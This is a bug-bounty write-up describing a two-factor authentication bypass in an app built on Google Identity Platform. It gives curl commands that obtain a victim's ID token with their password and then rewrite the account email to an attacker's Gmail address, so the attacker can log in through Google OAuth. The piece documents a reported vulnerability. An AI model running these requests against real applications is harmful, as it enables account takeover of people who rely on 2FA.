2FA Bypass via Google Identity & OAuth Login
Hello All,
This write-up is about another 2FA bypass that I was able to find on a private program. The application was using third party service for authentication. In this case it was Google Cloud Platform service called Identity Platform.
After authentication, the application redirects users to 2FA verification page.
Using the curl command given below, an attacker is able to retrieve the ID Token of a 2FA enabled account
Get ID Token
curl ‘https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=AIzaSr5kAE4GhcjsiwkNSks7sKSNbajsHn-SDk8' \
-H ‘Content-Type: application/json’ \
— data-binary ‘{“email”:”victim@wearehackerone.com”,”password”:”pass@1234",”returnSecureToken”:true}’
Once attacker has the token, the victim’s account email can be updated into attacker’s email id. Attacker will update it with his gmail id which will be used to bypass the 2FA.
Update email
curl ‘https://identitytoolkit.googleapis.com/v1/accounts:update?key=AIzaSr5kAE4GhcjsiwkNSks7sKSNbajsHn-SDk8' \
-H ‘Content-Type: application/json’ \
— data-binary \
‘{“idToken”:”eyJhbGciOiJSUzI1NiIsImtpZCI6IjA2M2E3Y2E0M2MzYzc2MDM2NzRlZGE0YmU5NzcyNWI3M2QwZGMwMWYiLCJ0eXAiOiJKV1.eyJyTRHsasdhasdjhsakdhaksjdaskjdsakdnkkcnm-wqe7qw909231kjSAHYnAjdlkjlksajdAHkhjbbqjksapOkJlkjqwejqwlknebnasdbasdbksagdjhvqwjkeqwgufebsadkjbsakajshd7qw86wqdehjkwqt521kKLWSJDLAjdja;sdjas;dj;sajdlasjd;kajsd.DbRLQU1bhwWOMQ9e-6IPb4VJmMMLdepYxP85OwQ5jX9PGw200Wl7GypNvDSXWqK0ArdcoQnLfOB-q00u03R1GGjalFgkAJSRdX9yQDZThwUKKXPQRvJBcKTuYpMesXY5UlI-m0UfOP-RjWWFi_TVvbFDmC9kuhutQ3_FmJs7HUq0Rj0TzagjrHBuXf9zDCoxvoIoyKjee9RvtPcrPUK8o1xs8hs7SNX9ioKoe4VLeAFVTEn8YiAQS-VqnnCe64yPjhV4sAvuJ1uDGA-_z-IMRJO9aJ7f0jTmU-WNzIRwQlTEgCOeWONkwHe-qJSX2Ph1z9QQRyEsoaDLgIuOw9lciw”,”email”:”attacker@gmail.com”,”returnSecureToken”:true}’
After updating the email id, attacker uses the Google OAuth option for authentication which is the alternative login method provided by the application.
Now attacker logs in with “attacker@gmail.com” & its password which grants them full access to victim’s account. Hence the 2FA implementation is bypassed successfully.
Since the attacker could gain complete access to victim’s account, it was triaged as High severity bug.
Hope you learned something new, have a good day. 😃
Disclaimer: For educational purpose only please do not try for illegal activities.
